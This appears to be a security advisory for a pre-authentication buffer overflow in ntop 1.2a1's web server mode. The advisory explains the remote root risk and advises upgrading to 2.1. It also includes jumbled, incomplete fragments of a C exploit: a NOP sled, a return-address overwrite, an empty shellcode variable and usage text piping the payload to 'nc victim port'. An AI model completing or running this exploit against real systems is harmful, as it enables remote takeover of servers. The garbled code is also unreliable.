ntop is a network usage monitoring tool for unix systems. It can be invoked at the console or as a server daemon, presenting statistics information via http with the -w parameter. In this mode, it is vulnerable to a buffer overflow before the user connecting to it can be authenticated. If exploited, an attacker can gain remote access to the system with the priviliges ntop is executing with.
It is interesting to note that setuid ntop drops priviliges before this can be exploited, but is installed on *BSD systems only executable by members of group wheel. This leads to the assumption that it may often be executed as root (since users in wheel typically have root access..), so despite the fact that it drops priviliges it can still yield remote root access for the attacker if exploited when run as root.
char shellcode =
printf("NTOP ntop-1.2a1 -w mode command execution exploit.\n");
printf("Usage : ./ntop-w-exp | nc victim port\n");
void main( int argc, char *argv )
#define CODE_LEN 240
#define NOP_LEN 50
unsigned long esp=0xbedffb00;
if(argc >= 2) offset = atoi(argv);
memset(code_buf,0x90,NOP_LEN); //insert NOP CODES
memcpy(code_buf+NOP_LEN, shellcode, strlen(shellcode));
*(long *)&code_buf[i]=(unsigned long)esp-offset;
A remote overflow exists in ntop when running in 'web server' (-w) mode. The program fails to validate input to the filename variable resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.
Upgrade to version 2.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.